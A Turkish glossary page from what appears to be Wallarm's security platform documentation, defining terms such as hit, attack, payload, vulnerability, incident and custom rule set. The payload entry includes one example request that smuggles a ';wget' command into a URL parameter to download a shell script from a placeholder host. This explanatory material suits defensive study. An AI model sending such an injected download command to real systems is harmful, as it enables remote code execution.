Sözlük¶

Sözlük, platformu daha iyi anlamanıza yardımcı olmak için temel Wallarm varlıklarını kapsar.

Hit¶

Hit, seri hale getirilmiş kötü amaçlı bir istektir (orijinal kötü amaçlı istek ve filtreleme düğümü tarafından eklenen meta veriler), örneğin:

Hit parametrelerinin ayrıntıları

Saldırı¶

Bir saldırı, gruplandırılmış tek bir hit veya birden fazla hit'tir.

Tek bir hit içeren bir saldırı örneği:

Birden çok hit içeren bir saldırı örneği:

Saldırıların nasıl anlaşılacağı ve analiz edileceğine dair ayrıntılara bakın.

Kötü Amaçlı Yük (Payload)¶

Orijinal isteğin aşağıdaki unsurları içeren bir bölümüdür:

• Bir istekte tespit edilen saldırı göstergeleri. Aynı saldırı türünü karakterize eden birden fazla saldırı göstergesi bir istekte tespit edilirse, yüke yalnızca ilk gösterge kaydedilir.

• Saldırı göstergesinin bağlamı. Bağlam, tespit edilen saldırı göstergelerinin öncesinde ve sonrasında yer alan semboller kümesidir. Yük uzunluğu sınırlı olduğundan, saldırı göstergesi tam yük uzunluğundaysa bağlam atlanabilir.

Örneğin:

• İstek:

  curl localhost/?23036d6ba7=%3Bwget+http%3A%2F%2Fsome_host%2Fsh311.sh
  

• Kötü amaçlı yük:

  ;wget+http://s
  

  Bu yükte, ;wget+ bir RCE saldırı göstergesidir ve yükün diğer kısmı saldırı göstergesinin bağlamıdır.

Saldırı göstergeleri davranışsal saldırıları tespit etmek için kullanılmadığından, davranışsal saldırıların bir parçası olarak gönderilen isteklerin yükleri boştur.

Zafiyet¶

Bir API oluşturulurken veya uygulanırken ihmal ya da yetersiz bilgi nedeniyle yapılan ve bilgi güvenliği riski doğurabilen bir hatadır.

Bilgi güvenliği riskleri şunlardır:

• Yetkisiz veri erişimi; örneğin, kullanıcı verilerini okuma ve değiştirme erişimi.

• Hizmet reddi.

• Veri bozulması ve diğerleri.

Zafiyetleri tespit etmek için İnternet trafiği kullanılabilir; Wallarm diğer işlevlerinin yanı sıra bunu yapar.

Güvenlik Olayı¶

Güvenlik olayı, bir zafiyetin istismar edilmesinin gerçekleşmesidir. Bir olay, doğrulanmış bir zafiyeti hedef alan bir saldırıdır.

Bir olay, tıpkı bir saldırı gibi, sisteminizin dışındaki bir varlıktır ve sistemin değil, dış İnternet'in bir özelliğidir. Mevcut zafiyetleri hedefleyen saldırılar azınlıkta olsa da, bilgi güvenliği açısından son derece önemlidir. Wallarm, mevcut zafiyetleri hedefleyen saldırıları otomatik olarak tespit eder ve bunları ayrı bir nesne – güvenlik olayı – olarak gösterir.

Ayrıca bkz.: Olay Analizi

Dairesel Arabellek¶

Dairesel arabellek, tek bir, sabit boyutlu arabelleği sanki uç uca bağlanmış gibi kullanan bir veri yapısıdır.
Bkz. Vikipedi.

Özel kural seti (önceki terim LOM)¶

Özel kural seti, Wallarm düğümleri tarafından Wallarm Cloud'dan indirilen derlenmiş güvenlik kuralları kümesidir.

Özel kurallar, trafik işleme için bireysel kurallar ayarlamanızı sağlar, örneğin:

• Wallarm Cloud'a yüklemeden önce hassas verileri maskele

• regexp tabanlı saldırı göstergeleri oluştur

• Etkin bir zafiyeti istismar eden istekleri engelleyen sanal yamayı uygula

• Belirli isteklerde saldırı tespitini devre dışı bırak, vb.

Özel kural seti varsayılan olarak boş değildir; örneğin [Settings → General tab] içindeki değerle filtreleme modu kuralı gibi, Bulutta kayıtlı tüm müşteriler için oluşturulan kuralları içerir (admin-en/configure-wallarm-mode.md#general-filtration-mode).

Özel kural setleri hakkında daha fazla bilgi

Geçersiz İstek¶

Filtre düğümü tarafından kontrol edilmiş ve LOM kurallarıyla eşleşmeyen bir istek.

Ters Proxy¶

Ters proxy, bir istemci adına bir sunucudan kaynakları alan ve bu kaynakları sanki Web sunucusunun kendisinden geliyormuş gibi istemciye iade eden bir proxy sunucu türüdür.
Bkz. Vikipedi.

Sertifika Otoritesi¶

Sertifika otoritesi, dijital sertifikalar veren bir kuruluştur.
Bkz. Vikipedi.

Was this page helpful?

How can we improve this article? (Optional)

Information is unclear or confusing

Insufficient information

Outdated or incorrect information

0/240

Send